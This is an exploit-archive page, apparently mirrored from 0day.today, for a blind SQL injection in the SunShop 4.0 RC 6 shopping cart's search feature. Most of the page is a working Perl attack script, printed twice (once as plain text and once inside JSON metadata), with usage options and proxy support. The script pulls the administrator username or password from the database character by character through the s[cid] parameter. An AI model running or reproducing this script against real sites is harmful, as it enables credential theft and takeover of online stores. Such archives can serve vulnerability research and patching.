Search...

SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit

2007-08-25T00:00:00

ID 1337DAY-ID-2086
Type zdt
Reporter k1tk4t
Modified 2007-08-25T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit
============================================================



#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
 print "\n                         \\#'#/                      ";
 print "\n                         (-.-)                       ";
 print "\n   -----------------oOO---(_)---OOo------------------";
 print "\n   | SunShop v4.0 RC 6 (search) Blind SQL Injection |";
 print "\n   |              k1tk4t - Indonesia                |";
 print "\n   |                coded by DNX                    |";
 print "\n   --------------------------------------------------";
 print "\n[!] Vendor: http://www.turnkeywebtools.com";
 print "\n[!] Bug: in the search script, u can inject sql code in the s[cid] parameter";
 print "\n[!] Solution: install v4.0.1";
 print "\n[!] Usage: perl sunshop.pl [Host] [Path] &lt;Options&gt;";
 print "\n[!] Example: perl sunshop.pl 127.0.0.1 /shop/ -i 1 -c 10 -o 1 -t ss_admins";
 print "\n[!] Options:";
 print "\n       -i [no]       Valid User-ID, default is 1";
 print "\n       -c [no]       Valid Category-ID with products, default is 1";
 print "\n       -o [no]       1 = get username (default)";
 print "\n                     2 = get password";
 print "\n       -t [name]     Changes the admin table name, default is admins";
 print "\n       -p [ip:port]  Proxy support";
 print "\n";
 exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $user    = 1;
my $cat     = 1;
my $column  = "username";
my $table   = "admins";
my %options = ();
GetOptions(\%options, "i=i", "c=i", "o=i", "t=s", "p=s");

print "[!] Exploiting...\n";

if($options{"i"}) { $user = $options{"i"}; }
if($options{"c"}) { $cat = $options{"c"}; }
if($options{"o"} && $options{"o"} == 2) { $column = "password"; }
if($options{"t"}) { $table = $options{"t"}; }

syswrite(STDOUT, "data:", 5);

for(my $i = 1; $i &lt;= 32; $i++)
{
 my $found = 0;
 my $h = 48;
 while(!$found && $h &lt;= 57)
 {
   if(istrue2($host, $path, $table, $user, $i, $h))
   {
     $found = 1;
     syswrite(STDOUT, chr($h), 1);
   }
   $h++;
 }
 if(!$found)
 {
   $h = 97;
   while(!$found && $h &lt;= 122)
   {
     if(istrue2($host, $path, $table, $user, $i, $h))
     {
       $found = 1;
       syswrite(STDOUT, chr($h), 1);
     }
     $h++;
   }
 }
}

print "\n[!] Exploit done\n";

sub istrue2
{
 my $host  = shift;
 my $path  = shift;
 my $table = shift;
 my $uid   = shift;
 my $i     = shift;
 my $h     = shift;

 my $ua = LWP::UserAgent-&gt;new;
 my $url = "http://".$host.$path."index.php?l=search_list&s[title]=Y&s[short_desc]=Y&s[full_desc]=Y&s[cid]=".$cat.")%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20WHERE%20id=".$uid."),".$i.",1)=CHAR(".$h.")/*";

 if($options{"p"})
 {
   $ua-&gt;proxy('http', "http://".$options{"p"});
 }

 my $response = $ua-&gt;get($url);
 my $content = $response-&gt;content;
 my $regexp = "Add To Cart";

 if($content =~ /$regexp/)
 {
   return 1;
 }
 else
 {
   return 0;
 }
}



#  0day.today [2018-01-05]  #

JSON Vulners Source

Initial Source

{"published": "2007-08-25T00:00:00", "id": "1337DAY-ID-2086", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2018-01-05T19:04:49", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-05T19:04:49", "rev": 2}, "vulnersScore": 0.0}, "type": "zdt", "lastseen": "2018-01-05T19:04:49", "edition": 2, "title": "SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit", "href": "https://0day.today/exploit/description/2086", "modified": "2007-08-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 16, "cvelist": [], "sourceHref": "https://0day.today/exploit/2086", "references": [], "reporter": "k1tk4t", "sourceData": "============================================================\r\nSunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit\r\n============================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\nuse LWP::UserAgent;\r\nuse Getopt::Long;\r\n\r\nif(!$ARGV[1])\r\n{\r\n print \"\\n \\\\#'#/ \";\r\n print \"\\n (-.-) \";\r\n print \"\\n -----------------oOO---(_)---OOo------------------\";\r\n print \"\\n | SunShop v4.0 RC 6 (search) Blind SQL Injection |\";\r\n print \"\\n | k1tk4t - Indonesia |\";\r\n print \"\\n | coded by DNX |\";\r\n print \"\\n --------------------------------------------------\";\r\n print \"\\n[!] Vendor: http://www.turnkeywebtools.com\";\r\n print \"\\n[!] Bug: in the search script, u can inject sql code in the s[cid] parameter\";\r\n print \"\\n[!] Solution: install v4.0.1\";\r\n print \"\\n[!] Usage: perl sunshop.pl [Host] [Path] <Options>\";\r\n print \"\\n[!] Example: perl sunshop.pl 127.0.0.1 /shop/ -i 1 -c 10 -o 1 -t ss_admins\";\r\n print \"\\n[!] Options:\";\r\n print \"\\n -i [no] Valid User-ID, default is 1\";\r\n print \"\\n -c [no] Valid Category-ID with products, default is 1\";\r\n print \"\\n -o [no] 1 = get username (default)\";\r\n print \"\\n 2 = get password\";\r\n print \"\\n -t [name] Changes the admin table name, default is admins\";\r\n print \"\\n -p [ip:port] Proxy support\";\r\n print \"\\n\";\r\n exit;\r\n}\r\n\r\nmy $host = $ARGV[0];\r\nmy $path = $ARGV[1];\r\nmy $user = 1;\r\nmy $cat = 1;\r\nmy $column = \"username\";\r\nmy $table = \"admins\";\r\nmy %options = ();\r\nGetOptions(\\%options, \"i=i\", \"c=i\", \"o=i\", \"t=s\", \"p=s\");\r\n\r\nprint \"[!] Exploiting...\\n\";\r\n\r\nif($options{\"i\"}) { $user = $options{\"i\"}; }\r\nif($options{\"c\"}) { $cat = $options{\"c\"}; }\r\nif($options{\"o\"} && $options{\"o\"} == 2) { $column = \"password\"; }\r\nif($options{\"t\"}) { $table = $options{\"t\"}; }\r\n\r\nsyswrite(STDOUT, \"data:\", 5);\r\n\r\nfor(my $i = 1; $i <= 32; $i++)\r\n{\r\n my $found = 0;\r\n my $h = 48;\r\n while(!$found && $h <= 57)\r\n {\r\n if(istrue2($host, $path, $table, $user, $i, $h))\r\n {\r\n $found = 1;\r\n syswrite(STDOUT, chr($h), 1);\r\n }\r\n $h++;\r\n }\r\n if(!$found)\r\n {\r\n $h = 97;\r\n while(!$found && $h <= 122)\r\n {\r\n if(istrue2($host, $path, $table, $user, $i, $h))\r\n {\r\n $found = 1;\r\n syswrite(STDOUT, chr($h), 1);\r\n }\r\n $h++;\r\n }\r\n }\r\n}\r\n\r\nprint \"\\n[!] Exploit done\\n\";\r\n\r\nsub istrue2\r\n{\r\n my $host = shift;\r\n my $path = shift;\r\n my $table = shift;\r\n my $uid = shift;\r\n my $i = shift;\r\n my $h = shift;\r\n\r\n my $ua = LWP::UserAgent->new;\r\n my $url = \"http://\".$host.$path.\"index.php?l=search_list&s[title]=Y&s[short_desc]=Y&s[full_desc]=Y&s[cid]=\".$cat.\")%20AND%20SUBSTRING((SELECT%20\".$column.\"%20FROM%20\".$table.\"%20WHERE%20id=\".$uid.\"),\".$i.\",1)=CHAR(\".$h.\")/*\";\r\n\r\n if($options{\"p\"})\r\n {\r\n $ua->proxy('http', \"http://\".$options{\"p\"});\r\n }\r\n\r\n my $response = $ua->get($url);\r\n my $content = $response->content;\r\n my $regexp = \"Add To Cart\";\r\n\r\n if($content =~ /$regexp/)\r\n {\r\n return 1;\r\n }\r\n else\r\n {\r\n return 0;\r\n }\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-05] #"}